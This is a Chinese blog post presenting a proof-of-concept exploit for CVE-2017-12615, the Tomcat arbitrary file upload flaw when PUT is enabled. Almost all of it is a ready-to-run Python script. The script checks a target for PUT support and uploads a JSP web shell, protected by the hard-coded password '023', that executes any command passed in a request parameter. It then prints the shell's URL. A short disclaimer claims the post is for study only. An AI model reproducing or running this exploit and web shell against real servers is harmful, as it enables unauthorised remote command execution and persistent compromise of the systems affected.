【CVE-2017-12615】Tomcat任意文件上传漏洞POC - 颓废's Blog

【CVE-2017-12615】Tomcat任意文件上传漏洞POC

  • 内容
  • 相关
前言:
记Tomcat开启PUT后的任意文件上传

影响版本:

7.0.0 – 7.0.81

需要因素:

conf/web.xml文件添加readonly参数,属性值为false

#! -*- coding:utf-8 -*-   
import httplib  
import sys  
import time  
body = '''''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp 
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''  
try:  
    conn = httplib.HTTPConnection(sys.argv[1])  
    conn.request(method='OPTIONS', url='/ffffzz')  
    headers = dict(conn.getresponse().getheaders())  
    if 'allow' in headers and \  
       headers['allow'].find('PUT') > 0 :  
        conn.close()  
        conn = httplib.HTTPConnection(sys.argv[1])  
        url = "/" + str(int(time.time()))+'.jsp/'  
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'  
        conn.request( method='PUT', url= url, body=body)  
        res = conn.getresponse()  
        if res.status  == 201 :  
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]  
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]  
        elif res.status == 204 :  
            print 'file exists'  
        else:  
            print 'error'  
        conn.close()  
    else:  
        print 'Server not vulnerable'  
          
except Exception,e:  
    print 'Error:', e  

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:【CVE-2017-12615】Tomcat任意文件上传漏洞POC - https://www.0dayhack.com/post-761.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注